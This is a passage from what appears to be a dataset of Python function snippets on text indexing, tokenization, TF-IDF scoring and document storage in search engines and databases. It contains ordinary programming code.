preprocess(text)\n postings = {}\n for word, ix in words:\n if word in postings:\n wordinfo = postings[word]\n else:\n wordinfo = {\"frequency\": 0, \"indexes\": []}\n postings[word] = wordinfo\n wordinfo[\"frequency\"] += 1\n wordinfo[\"indexes\"].append(ix)\n return postings", "def pre_process(self, documents):\n\n return documents", "def insert_many(self, documents: Iterable[dict]) -> None:\n for i, document in enumerate(documents):\n if isinstance(document, dict):\n self._store_document(document)\n else:\n raise TypeError(\n f\"The document at index {i} was not a dictionary. All documents must be dictionaries.\"\n )\n self._dump()", "def _docMapping(self):\n doc2quests = defaultdict(list)\n for q, d in self.quest2doc.items():\n doc2quests[d].append(q)\n return doc2quests", "def create_document_dictionary(documents):\n \n document_dictionary = dict()\n for document in documents:\n document_dictionary[document.cord_uid] = document\n return document_dictionary", "def transform4Doc2Vec(docs):\n\n # transform documents to be used by doc2Vec\n documents = []\n analyzedDocument = namedtuple('AnalyzedDocument', 'words tags')\n for i, doc in enumerate(docs):\n # use first line if documents are not tokenized, otherwise next line\n # words = text.lower().split()\n tags = [i]\n documents.append(analyzedDocument(doc, tags))\n\n return documents", "def _create_dictionary(self, document):\n words = self._normalize_words(document.words)\n unique_words = frozenset(words)\n return dict((word, idx) for idx, word in enumerate(unique_words))", "def enrich(self, lazy_corpus_loader, fileids=None):\n tag_dict = self.tag_dict\n word_tag_dict = self.word_tag_dict\n for word_tag in lazy_corpus_loader.tagged_words(fileids=fileids):\n word = word_tag[0]\n tag = word_tag[1]\n if not tag_dict.get(tag, None):\n raise KeyError, \"Unknown pos-tag: %s\" % tag\n tag_dict = word_tag_dict.get(word, {})\n tag_dict[tag] = tag_dict.get(tag, 0) + 1\n word_tag_dict[word] = tag_dict\n self.word_tag_dict = word_tag_dict", "def add(self, tokens):\n\n for token in tokens:\n self.vocab.add(token)\n\n for leader, token in generate_ngrams(tokens, self.size, include_terminator = self.size != 1):\n if leader not in self.frequencies:\n self.frequencies[leader] = Frequency()\n\n self.frequencies[leader].add(token)", "def set_doc_phrases(doc_phrases, docs, phrases):\n for doc in docs:\n if not doc in doc_phrases:\n doc_phrases[doc] = []\n doc_phrases[doc] = doc_phrases[doc] + phrases", "def tokenize_document(doc_info: dict, tokenizer: BertTokenizer, max_doc_length: int = None) -> dict:\n sub_tokens: List[str] = [] # all sub tokens of a document\n sentence_map: List[int] = [] # collected tokenized tokens -> sentence id\n subtoken_map: List[int] = [] # collected tokenized tokens -> original token id\n\n word_idx = -1\n\n for sentence_id, sentence in enumerate(doc_info['sentences']):\n for token in sentence:\n word_idx += 1\n word_tokens = tokenizer.tokenize(token)\n sub_tokens.extend(word_tokens)\n sentence_map.extend([sentence_id] * len(word_tokens))\n subtoken_map.extend([word_idx] * len(word_tokens))\n if max_doc_length:\n num_to_pad = max_doc_length - len(sub_tokens)\n sub_tokens.extend([\"[PAD]\"] * num_to_pad)\n sentence_map.extend([sentence_map[-1]+1] * num_to_pad)\n subtoken_map.extend(list(range(word_idx+1, num_to_pad+1+word_idx)))\n # global MAX_LENGTH\n # if len(sub_tokens) > MAX_LENGTH:\n # print(len(sub_tokens))\n # MAX_LENGTH = len(sub_tokens)\n # print(MAX_LENGTH)\n # todo(yuxian): need pad speakers?\n speakers = {subtoken_map.index(word_index): tokenizer.tokenize(speaker)\n for word_index, speaker in doc_info['speakers']}\n clusters = [[(subtoken_map.index(start), len(subtoken_map) - 1 - subtoken_map[::-1].index(end))\n for start, end in cluster] for cluster in doc_info['clusters']]\n tokenized_document = {'sub_tokens': sub_tokens, 'sentence_map': sentence_map, 'subtoken_map': subtoken_map,\n 'speakers': speakers, 'clusters': clusters, 'doc_key': doc_info['doc_key']}\n return tokenized_document", "def replace_words_fun(self):\n\n cleaned_doc = []\n for word in str(self.doc).split():\n if word.lower() in self.replacement_list.keys():\n cleaned_doc.append(self.replacement_list[word.lower()])\n else:\n cleaned_doc.append(word)\n self.doc = ' '.join(cleaned_doc)", "def get_idf_dict(clean_corpus, tf_list, num_docs):\n \n idf_dict = {}\n for i in range(num_docs):\n for key in tf_list[i].keys():\n if key not in idf_dict.keys():\n idf_dict[key] = 0\n idf_dict[key] = idf_dict[key] + 1\n \n for key in idf_dict.keys():\n idf_dict[key] = math.log2(num_docs/idf_dict[key])\n # idf_dict's keys -> all unique tokens in the corpus \n return idf_dict", "def initialize_document_frequencies():\n global document_frequency\n for term in dictionary:\n document_frequency[term] = len(postings[term])", "def preprocess_corpus(corpus, stop_list, stop_words=True, stemm=True, bag_words=True):\n corpus_preprocessed = list()\n for element in corpus:\n new_element = dict()\n new_element['document'] = preprocess_document(element['text'], stop_list, stop_words, stemm, bag_words)\n new_element['id'] = element['id']\n corpus_preprocessed.append(new_element)\n\n return corpus_preprocessed", "def create_tokens_li():\n cnt=0\n for file in docs:\n file_name = open(\"./corpus/\"+ str(file) + \".txt\")\n print(cnt)\n cnt+=1\n words = file_name.read()\n tokens_doc = nltk.word_tokenize(words)\n tokens_doc = [w.lower() for w in tokens_doc]\n #tokens_doc = [snowball_stemmer.stem(token) for token in tokens_doc]\n tokens_doc = [token for token in tokens_doc if token not in nltk.corpus.stopwords.words('english')]\n tokens_li.append(tokens_doc)\n\n\n #storing in json file\n with open('savers/tokens.json', 'w') as fp:\n json.dump(tokens_li, fp)", "def documents(self, documents):\n\n self._documents = documents", "def documents_to_dict(documents: List[Dict]) -> Dict[str, Dict]:\n res = {}\n for doc in documents:\n res[doc['id']] = doc\n return res", "def map_docs(docs_file):\n word_map = defaultdict(int)\n doc_count = 0\n token_count = 0\n\n for _, doc_tokens in tokenize(docs_file):\n doc_count += 1 # count document\n token_count += len(doc_tokens) # count tokens\n for token in set(doc_tokens):\n word_map[token] += 1 # increase inverted index count\n\n docs_file.seek(0) # reset file pointer\n return doc_count, token_count, word_map", "def updateScores(rankedLists):\n docToRank = {}\n for rankedList in rankedLists:\n\n f = open(rankedList, 'r')\n for line in f:\n documentID = line.split()[2]\n docno = documentID\n score = float(line.split()[4])\n position = int(line.split()[3])\n docToRank[docno] = (position,score)\n f.close()\n client = MongoClient('asr2.iem.technion.ac.il',27017)\n db = client.asr16\n documents = db.documents.find({})\n for document in documents:\n key = document[\"query_id\"]+\"-\"+document[\"username\"]\n document['position'] = docToRank[key][0]\n document['score'] = docToRank[key][1]\n document['posted_document'] = document['current_document']\n db.documents.save(document)", "def merge_docs(self):", "def run(self, mapping={}, *args, **kwargs):\n self.processed = 0\n for batch in self._process_by_batch(self.load(*args, **kwargs)):\n batch = list(map(lambda doc: self._apply_mapping(doc, mapping), batch))\n for doc in batch:\n self._ingest(iterable=doc, doctype=doc[\"doctype\"])\n self.processed += 1\n logger.info(\"Added {} documents to the database.\".format(self.processed))", "def make_vocab_from_docs(docs):\n vocab_words=set()\n for doc in docs:\n doc=doc.lower()\n doc=re.sub(r'-',' ',doc)\n doc=re.sub(r' +',' ',doc) # turn multiple spaces into a single space\n doc=re.sub(r'[^a-z ]','',doc) # remove anything that is not a-z or space\n words=set(doc.split())\n vocab_words=vocab_words.union(words)\n vocab=dict(zip(vocab_words,range(len(vocab_words))))\n return vocab", "def _prepare_analysis_input(self, documents):\n subdoc_to_doc_map = {}\n wordtype_to_number = {}\n number_to_wordtype = []\n wordtypes = {}\n \n # prevent duplicating work\n if os.path.exists(self.wordtype_file):\n return\n \n try:\n # First find singletons\n if self.remove_singletons:\n word_type_count_threshold = max(1, int(math.log(documents.count(), 10)) - 2)\n temp_word_type_counts = {}\n for doc_index, doc in enumerate(documents):\n tokens = self.tokenize(doc.get_content())\n for token, token_start in tokens:\n temp_word_type_counts[token] = temp_word_type_counts.setdefault(token, 0) + 1\n for word_type, count in temp_word_type_counts.iteritems(): # add singletons to stopword list\n if count <= word_type_count_threshold:\n self._excluded_words[word_type] = True\n with io.open(self.excluded_words_file, 'w', encoding='utf-8') as ex_f:\n ex_f.write(unicode(json.dumps(self._excluded_words)))\n \n haltwords = dict(self.stopwords)\n haltwords.update(self._excluded_words)\n # Second find bigrams, iterate through documents and train.\n if self.find_bigrams:\n from import_tool.analysis.bigram_finder import BigramFinder\n bigram_finder = BigramFinder(stopwords=haltwords)\n for doc_index, doc in enumerate(documents):\n bigram_finder.train(doc_index, self.tokenize(doc.get_content()))\n bigram_finder.print()\n \n # Third, we're going to stem words\n if self.stem_words:\n from import_tool.analysis.stemmer import Stemmer\n stemmer = Stemmer(self._working_dir, self.base_dir)\n \n # for each document tokenize and map tokens to numbers to avoid regex problems before passing data to Mallet\n with io.open(self.mallet_input_file, 'w', encoding='utf-8') as w:\n with io.open(self.start_index_file, 'w', encoding='utf-8') as w2:\n count = 0\n subcount = 0\n for doc_index, doc in enumerate(documents):\n doc_content = unicode(doc.get_content())\n count += 1\n subdocuments = self.create_subdocuments(doc_index, doc_content)\n token_start_index_offset = 0 # needed to make sure the start index remains correct once the document is re-merged\n for subdoc_name, subdoc_content in subdocuments:\n if subcount > 0:\n w2.write(u'\\n')\n subcount += 1\n subdoc_to_doc_map[subdoc_name] = doc_index\n tokens = self.tokenize(subdoc_content)\n \n if self.find_bigrams:\n tokens = bigram_finder.combine(tokens, subdoc_content)\n \n token_numbers = []\n token_start_indices = []\n only_tokens = []\n tokens_temp = []\n for tok, tok_start in tokens:\n only_tokens.append(tok)\n tokens_temp.append([tok, tok_start + token_start_index_offset])\n tokens = tokens_temp\n tokens_temp = None\n if self.stem_words:\n stemmed_tokens = stemmer.stem(only_tokens)\n else:\n stemmed_tokens = only_tokens\n for tup, tok_stem in zip(tokens, stemmed_tokens):\n tok, tok_start = tup\n wordtypes[tok] = True\n wordtypes[tok_stem] = True\n try:\n tok_num = wordtype_to_number[tok_stem]\n except:\n tok_num = len(wordtype_to_number)\n number_to_wordtype.append(tok_stem)\n wordtype_to_number[tok_stem] = tok_num\n token_numbers.append(unicode(tok_num))\n token_start_indices.append([tok, tok_start])\n text = u' '.join(token_numbers)\n w.write(u'{0} all {1}\\n'.format(subdoc_name, text))\n w2.write(unicode(json.dumps(token_start_indices)))\n token_start_index_offset += len(subdoc_content)\n for tok, tok_start in tokens:\n try:\n assert doc_content[tok_start:tok_start+len(tok)].lower() == tok.lower()\n except:\n print(tok_start)\n print(len(tok))\n print('\"'+doc_content[tok_start:tok_start+len(tok)].lower()+'\"')\n print('\"'+tok.lower()+'\"')\n raise\n if not count:\n raise Exception('No files processed.')\n # record which subdocuments belong to which documents\n with io.open(self.subdoc_to_doc_map_file, 'w', encoding='utf-8') as w:\n w.write(unicode(json.dumps(subdoc_to_doc_map)))\n with io.open(self.wordtype_to_number_file, 'w', encoding='utf-8') as w:\n w.write(unicode(json.dumps(wordtype_to_number)))\n with io.open(self.number_to_wordtype_file, 'w', encoding='utf-8') as w:\n w.write(unicode(json.dumps(number_to_wordtype)))\n with io.open(self.wordtype_file, 'w', encoding='utf-8') as w:\n w.write(unicode(json.dumps(wordtypes)))\n except: # cleanup\n self._cleanup(self.mallet_input_file)\n self._cleanup(self.subdoc_to_doc_map_file)\n self._cleanup(self.wordtype_to_number_file)\n self._cleanup(self.number_to_wordtype_file)\n self._cleanup(self.wordtype_file)\n self._cleanup(self.excluded_words_file)\n raise", "def current_word_PL(current_word, file_reader_last_read_list, doc_dict, nb_doc):\n word_posting_list = {} # { key = doc , value = score }\n for idx, file_reader_last_read in enumerate(file_reader_last_read_list):\n if file_reader_last_read[\"last_read\"][\"word\"] == current_word:\n docs = file_reader_last_read[\"last_read\"][\"doc_score_list\"]\n add_doc_in_posting_list(word_posting_list=word_posting_list, docs=docs)\n file_reader_last_read_list[idx]=read_line_and_update(file_reader_and_last_read=file_reader_last_read)\n for key, value in word_posting_list.items():\n tf = float(value) / doc_dict[int(key)]\n idf = math.log((float(nb_doc)/len(word_posting_list)),2)\n score = tf*idf\n word_posting_list[key]=score \n word_posting_list = sort_and_cast_doc_in_posting_list(word_posting_list=word_posting_list)\n return word_posting_list", "async def put_documents(self, collection, documents):\n await self.ensure_collection(collection)\n try:\n if SOLR_COMMIT_WITHIN:\n params = {'commitWithin': SOLR_COMMIT_WITHIN}\n else:\n params = {'commit': 'true'}\n await self.post(\n '/v2/collections/{}/update'.format(collection),\n params=params, json_data=documents\n )\n logger.info('Successfully indexed {} documents to collection {}'\n .format(len(documents), collection))\n except SolrError:\n logger.warning('Failed to put {} documents to collection {}'\n .format(len(documents), collection))\n raise", "def from_documents(cls, documents):\n # return cls.from_words(_itertools.chain(*documents))\n return cls.from_words(\n cls._build_new_documents(documents, cls.default_ws, pad_right=True)\n )", "def add_new_doc(self, document, end_of_corpus):\n max_tf = 0\n unique_terms_counter = 0\n document_dictionary = document.term_doc_dictionary\n # Go over each term in the doc\n for term in document_dictionary:\n try:\n # Update inverted index and posting\n if term not in self.inverted_idx:\n self.inverted_idx[term] = 1\n unique_terms_counter += 1\n else:\n self.inverted_idx[term] += 1\n if term not in self.posting_dict:\n self.posting_dict[term] = []\n\n self.posting_dict[term].append(\n (document.tweet_id, document_dictionary[term])) # key: str , value: array of tuples\n\n max_tf = max(document_dictionary[term], max_tf)\n\n except:\n\n print('problem with the following key {}'.format(term[0]))\n\n document.max_tf = max_tf\n document.unique_terms = unique_terms_counter\n self.docs_count += 1\n\n modulo = int(document.tweet_id) % 10\n self.documents[modulo][document.tweet_id] = [document.term_doc_dictionary, document.max_tf]\n\n if self.docs_count == self.DOCS_SIZE or end_of_corpus: # if we reach chunk size or end of corpus\n self.add_to_file(end_of_corpus)\n self.docs_count = 0\n self.posting_dict = {}\n\n for i in self.documents: # 0 - 9\n if self.documents[i].__len__() > 15000:\n doc = utils.load_obj(self.out + \"document\" + str(i))\n doc.update(self.documents[i])\n utils.save_obj(doc, self.out + \"document\" + str(i))\n self.documents[i] = {}", "def upload(self, documents: List[Document], vectorise_func) -> None:\n\n # Add doc_store to documents\n for d in documents:\n d.doc_store = self\n # Check ID uniqueness\n check_duplicate_documents(documents)\n # Check type consistency\n check_document_types(documents)\n # Batching\n batches = batch_items(documents)\n\n # Update document class conveniently\n if issubclass(type(documents[0]), ChunkedDocument):\n self._doc_class = ChunkedDocument\n\n for batch in batches:\n vectorise_func(batch, self)\n self.documents += batch", "def add_doc(self, document):\n # Split document up into list of strings\n #words = self.tokenize(document)\n words = document\n # Count word frequencies in this document\n word_counts = {}\n for word in words:\n word_counts[word] = word_counts.get(word, 0) + 1\n # Add word counts as new row to sparse matrix\n self.sparse.append(word_counts)\n # Add to total document count for each word\n for word in word_counts:\n self.doc_count[word] = self.doc_count.get(word, 0) + 1", "def _apply_mapping(self, document, mapping):\n if not mapping:\n return document\n new_document = {v: document[k] for k, v in mapping.items() if k in document}\n # Keep track of missing keys\n self.missing_keys.update([k for k in mapping if k not in document])\n\n # Document errors for missing documents\n if not new_document:\n self.failed += 1\n self.failed_ids.append(\n document.get(\"id\", document.get(\"ID\", document.get(\"_id\", None)))\n )\n return new_document", "def _merge_conllu_subtokens(self, lines: List[str], doc: Doc)-> Doc:\n # identify and process all subtoken spans to prepare attrs for merging\n subtok_spans = []\n for line in lines:\n parts = line.split(\"\\t\")\n id_, word, lemma, pos, tag, morph, head, dep, _1, misc = parts\n if \"-\" in id_:\n subtok_start, subtok_end = id_.split(\"-\")\n subtok_span = doc[int(subtok_start) - 1 : int(subtok_end)]\n subtok_spans.append(subtok_span)\n # create merged tag, morph, and lemma values\n tags = []\n morphs = {}\n lemmas = []\n for token in subtok_span:\n tags.append(token.tag_)\n lemmas.append(token.lemma_)\n if token._.merged_morph:\n for feature in token._.merged_morph.split(\"|\"):\n field, values = feature.split(\"=\", 1)\n if field not in morphs:\n morphs[field] = set()\n for value in values.split(\",\"):\n morphs[field].add(value)\n # create merged features for each morph field\n for field, values in morphs.items():\n morphs[field] = field + \"=\" + \",\".join(sorted(values))\n # set the same attrs on all subtok tokens so that whatever head the\n # retokenizer chooses, the final attrs are available on that token\n for token in subtok_span:\n token._.merged_orth = token.orth_\n token._.merged_lemma = \" \".join(lemmas)\n token.tag_ = \"_\".join(tags)\n token._.merged_morph = \"|\".join(sorted(morphs.values()))\n token._.merged_spaceafter = (\n True if subtok_span[-1].whitespace_ else False\n )\n\n with doc.retokenize() as retokenizer:\n for span in subtok_spans:\n retokenizer.merge(span)\n\n return doc", "def count_doc_frequencies(self, docs):\n frequencyIndex = {}\n doc_id = 0\n for doc in docs:\n for term in doc:\n if term not in frequencyIndex:\n frequencyIndex[term] = [doc_id]\n else:\n for id in frequencyIndex[term]:\n if doc_id == id:\n break\n else:\n frequencyIndex[term].append(doc_id)\n doc_id+=1\n\n for term in frequencyIndex:\n occurences = len(frequencyIndex[term])\n frequencyIndex[term] = occurences\n\n return frequencyIndex", "def set_documents(cls, input_list_text: List[str]) -> None:\n cls.documents = input_list_text", "def featurize(movies):\n ###TODO \n movies['features'] = \"\" \n get_h = set() \n vocab_dict = {}\n df_dict_return = {}\n tup_list = []\n index_dict = {}\n index_dict_1 = {}\n movie_len = len(movies) \n #print(\"MovieLength::\",movie_len)\n #print(\"MOVIES:::\",movies)\n \n get_h = cal_unique_features(movies) # num_features\n\n vocab_dict = cal_unique_vocab(get_h) # vocab complete\n\n len_vocab = len(get_h)\n \n df_dict_return = cal_unique_docs(get_h,movies) # df(i)\n\n for token in get_h :\n #tup_list.clear()\n #print(\"token_GOTTTTT:::\",token)\n for index,row in movies.iterrows(): \n #print(\"row_got::\",row)\n gen_list = row['tokens']\n #print(\"gen_list::\",gen_list)\n #mov_id = row['movieId'] \n #print(\"mov_id::\",mov_id)\n token_count_1 = Counter(gen_list).most_common()[:1]\n tok = token_count_1[0]\n index_dict_1[index] = tok[1]\n token_count = gen_list.count(token)\n #print(\"token_count::\",token_count)\n tup = (index,token_count)\n #print(\"tuple::\",tup)\n tup_list.append(tup)\n #print(\"LIST_PRINT:::::::::::::\",tup_list)\n index_dict[token] = tup_list\n tup_list = []\n \n \n #print(\"INDEX_DICT:::\",index_dict) # tf(i,d)\n #print(\"INDEX_DICT_1:::\",index_dict_1) # max_k dict per docx\n \n \n for ind, row in movies.iterrows():\n data_list = []\n rows_list = []\n columns_list = []\n gen_list = row['tokens']\n #print(\"TOKENS GOTTT::\",gen_list) \n for gen in gen_list:\n tf = get_tf_value(index_dict,gen,ind)\n #print(\"TF GOTTT::\",tf) \n tf_weight = float( tf / index_dict_1[ind])\n #print(\"tf_weight::\",tf_weight)\n df_weight = float( math.log10( movie_len / df_dict_return[gen] ) )\n #print(\"df_weight::\",df_weight)\n final_tfidf = tf_weight * df_weight\n #print(\"final_tfidf::\",final_tfidf)\n data_list.append(final_tfidf)\n columns_list.append(vocab_dict[gen])\n rows_list.append(0) \n csr = csr_matrix((data_list, (rows_list,columns_list)), shape=(1,len_vocab))\n #print(\"TYPE of CSR GOTT::\",type(csr))\n #print(\"CSR GOTT:::\",csr) \n movies.set_value(ind, 'features', csr)\n \n #print(\"UPDATE movies::\",movies) \n\n return(movies,vocab_dict)\n \n\n pass", "def index_terms(self):\n [[self.set_postings(term, id) for term in NLProcessor.process(doc)] for id, doc in\n self.doc_store.dict.iteritems()]", "def updateWordCounts():\n emaildata = loadEmailData()\n englishwords = importDictionary()\n countAllWords(emaildata, englishwords)", "def set_document_numbers(notices):\n\n if len(notices) > 1:\n for notice in notices:\n notice['document_number'] = split_doc_num(\n notice['document_number'], notice['effective_on'])\n return notices", "def set_document_numbers(notices):\n\n if len(notices) > 1:\n for notice in notices:\n notice['document_number'] = split_doc_num(\n notice['document_number'], notice['effective_on'])\n return notices", "def update(self, docs: DocumentArray, *args, **kwargs):\n cursor = self.connection.cursor()\n psycopg2.extras.execute_batch(\n cursor,\n f'UPDATE {self.table} SET DOC = %s WHERE ID = %s',\n [\n (\n doc.SerializeToString(),\n doc.id,\n )\n for doc in docs\n ],\n )\n self.connection.commit()", "def add_documents(self, docs):\n for doc in docs:\n assert isinstance(doc, pylastica.document.Document), \"All items in list docs must be of type Document: %r\" % doc\n doc.doc_type = self.name\n return self.index.add_documents(docs)", "def updateWordList(emailids):\n with open('res/dictionary.txt', 'r') as f:\n lines = f.readlines()\n words = set([line.strip() for line in lines])\n\n with open('res/dictionary.txt', 'a') as f:\n for emailid in emailids: \n email = e.Email(emailid)\n subject = set(email.parsedsubject)\n body = set(email.body)\n try:\n emailcontent = body.union(subject)\n for word in emailcontent:\n if not word in words:\n words.add(word)\n f.write(word + '\\n')\n except AttributeError:\n print(body)", "def update_documents(self, engine_name, documents):\n endpoint = \"engines/{}/documents\".format(engine_name)\n data = json.dumps(documents)\n\n return self.swiftype_session.request('patch', endpoint, data=data)", "def create_freq_dict(corpus, doc_info):\n for idx, content in enumerate(corpus):\n word_freq_table = {}\n splitted_sentence = content.split()\n for word in splitted_sentence:\n word = word.lower()\n if word not in word_freq_table:\n word_freq_table[word] = 1\n else:\n word_freq_table[word] += 1\n doc_info[idx]['freq_dict'] = word_freq_table", "def index_feats_dict(self):\n doc_features_dict = {}\n\n for index, doc in zip(self.index, self.series):\n # Sets for a doc and feature words\n doc_set = set(doc.split())\n feat_set = set(self.features)\n\n # Shared words between the two sets\n interset_words = doc_set.intersection(feat_set)\n\n # Append to doc_features_dict\n doc_features_dict[index] = list(interset_words)\n\n return doc_features_dict", "def pos():\n pos_list = []\n for token in doc:\n pos_list.append(token.pos_)\n setList = list(set(pos_list))\n my_dict = {i: pos_list.count(i) for i in setList}\n print(my_dict)", "def finish_documents():\n\n doc_ids = json.loads(request.form['doc_ids'])\n\n for docid in doc_ids:\n\n document = Document.query.filter_by(id=docid).first_or_404()\n\n document.status = \"OK\"\n\n db.session.add(document)\n\n db.session.commit()", "def test_update_list(self):\n u = stellr.UpdateCommand(TEST_HTTP)\n docs = [{'a': 1}, {'b': 2}]\n u.add_documents(docs)\n self.assertEqual(2, len(u._commands))\n self.assertEqual(u.body,\n ('{\"add\": {\"doc\": {\"a\": 1}}'\n ',\"add\": {\"doc\": {\"b\": 2}}}'))", "def add_documents(self, documents):\n\t\t\n\t\t# flag for StopIteration exceptions\n\t\tmore_documents = True\n\t\t# loop while there are still documents in the iterator\n\t\twhile more_documents:\n\t\t\t# increment batch number\n\t\t\tbatch = len(self.batch_stats) + 1\n\t\t\t# count sentences\n\t\t\tsentences_count = 0\n\t\t\t# create temporary batch data file in the version directory\n\t\t\tbatch_file = os.path.join(self.file_base.get_version_path(self.version), \"data.jl.gz.temp\")\n\t\t\t# try to read the next batch of files, catch exception and stop if there are no more\n\t\t\ttry:\n\t\t\t\t# get next document before opening the file just to make sure it's there\n\t\t\t\tdocument = documents.next()\n\t\t\t\t# open the data file\n\t\t\t\twith gzip.open(batch_file, \"wb\") as outfile:\n\t\t\t\t\t# loop through DOCUMENT_BATCH_SIZE documents\n\t\t\t\t\tfor i in range(DocumentDatabase.DOCUMENT_BATCH_SIZE):\n\t\t\t\t\t\t# count sentences in document\n\t\t\t\t\t\tfor paragraph in document[\"paragraphs\"]:\n\t\t\t\t\t\t\tsentences_count += len(paragraph[\"sentences\"])\n\t\t\t\t\t\t# write JSON to file one line at a time\n\t\t\t\t\t\toutfile.write(\"%s\\n\" % json.dumps(document))\n\t\t\t\t\t\t# if we are not done with this batch, retrieve the next document\n\t\t\t\t\t\tif i < DocumentDatabase.DOCUMENT_BATCH_SIZE - 1:\n\t\t\t\t\t\t\tdocument = documents.next()\n\t\t\texcept StopIteration:\n\t\t\t\t# the end of the documents stream, set the flag to False\n\t\t\t\tmore_documents = False\n\t\t\t# make sure the batch isn't empty\n\t\t\tif sentences_count > 0:\n\t\t\t\t# create the new batch in the file system\n\t\t\t\tself.version_batches.create_latest_version()\n\t\t\t\t# add the stats to the statistics hash\n\t\t\t\tself.batch_stats[batch] = BatchStats(sentences_count)\n\t\t\t\t# write the batch statistics to file\n\t\t\t\twith codecs.open(self._get_batch_stat_file(batch), \"wb\", \"utf-8\") as outfile:\n\t\t\t\t\t# write the JSON representation for the stats\n\t\t\t\t\toutfile.write(json.dumps(self.batch_stats[batch].to_json()))\n\t\t\t\t# move the temp data file to the correct location inside the version folder\n\t\t\t\tos.rename(batch_file, self._get_batch_file(batch))", "def get_preprocessed_docs(formatted_docs):\r\n preprocessed_docs = {}\r\n for idx in formatted_docs.keys():\r\n preprocessed_docs[idx] = preprocess(formatted_docs[idx])\r\n return preprocessed_docs", "def load_flattened_documents(data_dir: str, docids: Set[str]) -> Dict[str, List[str]]:\n unflattened_docs = load_documents(data_dir, docids)\n flattened_docs = dict()\n for doc, unflattened in unflattened_docs.items():\n flattened_docs[doc] = list(chain.from_iterable(unflattened))\n return flattened_docs", "def build(self,documents):\n\t\tself.vectorKeywordIndex = self.getVectorKeywordIndex(documents)\n\n\t\tself.documentVectors = [self.createVector(document) for document in documents]", "def _build_token_dict(self, corpus: List[List[str]], min_count: int = 3):\n token2idx = {\n self.token_pad: 0,\n self.token_unk: 1,\n self.token_bos: 2,\n self.token_eos: 3\n }\n\n token2count = {}\n for sentence in corpus:\n for token in sentence:\n count = token2count.get(token, 0)\n token2count[token] = count + 1\n\n # 按照词频降序排序\n sorted_token2count = sorted(token2count.items(),\n key=operator.itemgetter(1),\n reverse=True)\n token2count = collections.OrderedDict(sorted_token2count)\n\n for token, token_count in token2count.items():\n if token not in token2idx and token_count >= min_count:\n token2idx[token] = len(token2idx)\n\n self.token2idx = token2idx\n self.idx2token = dict([(value, key)\n for key, value in self.token2idx.items()])\n logging.debug(f\"build token2idx dict finished, contains {len(self.token2idx)} tokens.\")\n self.dataset_info['token_count'] = len(self.token2idx)", "def update_words(data, book_num):\n\tglobal word_count\n\t#find count of each word in the book and update the dictionary\n\tfor words in data:\n\t\tword_count[words][book_num] = (word_count.get(words,0)[book_num] + 1)\n\t#print(word_count)", "def generate_dict(self):\n dict = defaultdict(list)\n for i in range(self.no_of_docs-1):\n doc_txt = self.doc_to_df(i)\n #assign key to index in dictionary and its locations as tuples(docid,line,wordpos) as the values\n for j in range(len(doc_txt)):\n for k in range(doc_txt.shape[1]):\n key = doc_txt[k][j]\n dict[key].append((i,j,k))", "def parse_doc(self, doc_as_list):\n tweet_id = doc_as_list[0]\n tweet_date = doc_as_list[1]\n full_text = doc_as_list[2]\n url = doc_as_list[3]\n retweet_text = doc_as_list[4]\n retweet_url = doc_as_list[5]\n quote_text = doc_as_list[6]\n quote_url = doc_as_list[7]\n term_dict = {}\n tokenized_text = self.parse_sentence(full_text)\n doc_length = len(tokenized_text) # after text operations.\n\n for i, term in enumerate(tokenized_text):\n if term not in term_dict.keys():\n term_dict[term] = [1, [i]]\n else:\n term_dict[term][0] += 1\n term_dict[term][1].append(i)\n\n document = Document(tweet_id, tweet_date, full_text, url, retweet_text, retweet_url, quote_text,\n quote_url, term_dict, doc_length)\n return document", "def set(self, doc, fields_values):\n fields_values = Object.from_bson(fields_values)\n for k,v in fields_values.items():\n self._set(doc, k.split('.'), v)\n impl = self._impl(doc)\n return impl.update({'_id':doc._id}, {'$set':fields_values})", "def extract(self, documents):\n\n # Feature vector to return\n features = np.zeros((len(documents), len(self.idx_to_word)))\n\n # Raise an exception if 'extract' is called before 'preprocess'\n if len(self.word_to_idx) == 0 or len(self.idx_to_word) == 0:\n raise Exception(\"Dictionary not initialised.\")\n\n # Iterate over all documents\n for idx, doc in enumerate(documents):\n # Split the doc into a list of words\n words = extract_words(doc)\n\n # For each word\n for w in words:\n # Calculate it's frequency, however, keep in mind\n # that this word may not have been in the training\n # corpus. In that case, ignore the word.\n ''' YOUR CODE HERE '''\n try:\n features[idx][self.word_to_idx[w]] = words.count(w)\n except KeyError:\n pass\n\n ''' END CODE FOR THIS LOOP '''\n\n # Divide the vector by the total number of words in the document to\n # normalize the frequencies.\n ''' YOUR CODE HERE '''\n features[idx] = features[idx]/len(words)\n ''' END CODE FOR THIS LOOP '''\n\n return features", "def _vector_mapping(self) -> dict:\n words = set()\n for file in os.listdir(self.processed_path):\n doc_path = f\"{self.processed_path}/{file}\"\n with open(doc_path, 'r') as f:\n text_words = f.readline().split()\n words = words.union(set(text_words))\n words = list(words)\n words.sort()\n\n return dict(zip(words, range(len(words))))", "def add(self, token_docid):\n token = token_docid[0]\n doc_id = token_docid[1]\n # collapse identical tokens together\n if token in self.posting:\n self.posting[token].append(doc_id)\n else:\n self.posting[token] = [doc_id]", "def __call__(self, doc: Doc) -> Doc:\n for val in self._get_vals(doc):\n key = self._get_key(val)\n try:\n self._table.get(key).append(val)\n except AttributeError:\n self._table.set(key, [val])\n self._size += 1\n return super().__call__(doc)", "def __parse_corpus(self, corpus):\n corpus = self.__handle_corpus_unkwon_words(corpus)\n start_token = ' '.join([NGramModel.START_SENTENCE_TOKEN]*(self.__n-1))\n word_list = corpus.replace(NGramModel.START_SENTENCE_TOKEN, start_token).split()\n \n for n in range(1, self.__n+1): \n self.__ngram_counts[n] = {}\n for ngram, count in Counter(self.__generate_n_grams(word_list, n)).items():\n self.__ngram_counts[n][' '.join(ngram)] = count", "def documents(self, **kw):\r\n \r\n doc_reader = self.doc_reader\r\n return (doc_reader[docnum] for docnum in self.document_numbers(**kw))", "def merge_all_claims_norm_dicts_for_docs(): \n# docs_norm_scores_dicts_path = base_path+\"\\\\docs_norm_scores_dicts\"\n docs_norm_scores_dicts_path = linux_base_path+\"/docs_norm_scores_dicts\"\n# all_claims_norms_scores_merged_dict = base_path +\"\\\\all_claims_norms_scores_merged_dict\"\n all_claims_norms_scores_merged_dict = linux_base_path +\"/all_claims_norms_scores_merged_dict\"\n for alpha in range(0,11,1):\n for beta in range(0,10,1):\n docs_scores_all_claims = {}\n for filename in os.listdir(docs_norm_scores_dicts_path):\n (alpha_f,beta_f)=turn_to_float([alpha,beta])\n if \"_alpha_\"+str(alpha_f)+\"_\" in filename and \"_beta_\"+str(beta_f)+\"_\" in filename:\n curr_dict = 